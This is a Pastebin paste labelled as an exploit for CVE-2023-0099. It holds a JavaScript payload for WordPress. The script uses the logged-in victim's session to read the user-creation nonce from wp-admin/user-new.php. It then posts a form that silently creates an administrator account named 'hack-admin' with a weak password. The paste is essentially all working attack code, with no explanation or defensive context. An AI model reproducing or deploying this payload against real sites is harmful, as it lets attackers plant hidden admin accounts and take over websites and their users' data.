Advertisement
FlyFar

CVE-2023-0099 Vulnerability Exploit

Jan 17th, 2024
1,083
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.06 KB | Cybersecurity | 0 0
  1. function getCSRFToken(url, csrf_token_id, func){
  2.     var xhr = new XMLHttpRequest();
  3.     xhr.onreadystatechange = function(){
  4.     if(this.readyState == 4 && this.status == 200){
  5.         var parser = new DOMParser();
  6.         var htmlDocument = parser.parseFromString(this.responseText, "text/html");
  7.         var token = htmlDocument.getElementById(csrf_token_id).value;
  8.         func(token);
  9.         }
  10.  
  11.     };
  12.     xhr.open("GET", url, true);
  13.     xhr.withCredentials = true;
  14.     xhr.send();
  15.  
  16. }
  17.  
  18. function addAdmin(token){
  19.     var xhr = new XMLHttpRequest();
  20.     xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
  21.     xhr.withCredentials = true;
  22.     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  23.     xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&email=hack@gmail.com&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
  24. }
  25.  
  26. getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);
  27.  
  28.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement